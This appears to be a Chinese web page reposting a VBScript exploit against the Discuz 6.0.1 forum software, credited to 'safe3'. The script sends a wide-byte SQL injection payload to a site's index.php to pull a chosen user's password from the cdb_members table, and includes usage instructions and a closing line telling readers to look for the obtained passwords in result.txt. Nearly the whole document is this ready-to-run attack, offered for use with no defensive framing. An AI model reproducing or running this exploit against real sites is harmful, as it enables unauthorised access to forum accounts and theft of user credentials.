我要评论复制代码
代码如下:dim strurl,strsite,strpath,struid
showb()
set args = wscript.arguments
if args.count <> 3 then
showu()
else
strsite=args(0)
strpath=args(1)
struid=args(2)
end if
strurl="action=search&searchid=22%cf' union select 1,password,3,password/**/from/**/cdb_members/**/where/**/uid=" & struid &"/*&do=submit"
set objxml = createobject("microsoft.xmlhttp")
objxml.open "post",strsite & strpath & "index.php", false
objxml.setrequestheader "accept", "*/*"
objxml.setrequestheader "accept-language", "zh-cn"
objxml.setrequestheader "content-type", "application/x-www-form-urlencoded"
objxml.setrequestheader "user-agent", "wap"
objxml.send(strurl)
wscript.echo(objxml.responsetext)
sub showb()
with wscript
.echo("+--------------------------=====================------------------------------+")
.echo("exploit discuz6.0.1")
.echo("code by safe3")
.echo("+--------------------------=====================------------------------------+")
end with
end sub
sub showu()
with wscript
.echo("+--------------------------=====================------------------------------+")
.echo("用法:")
.echo(" cscript "&.scriptname&" site path uid")
.echo("例子:")
.echo(" cscript "&.scriptname&" http://www.example.com/ /forum/ 1 >result.txt")
.echo("+--------------------------=====================------------------------------+")
.quit
end with
end sub
获得的密码大家自己在result.txt中查找
发表评论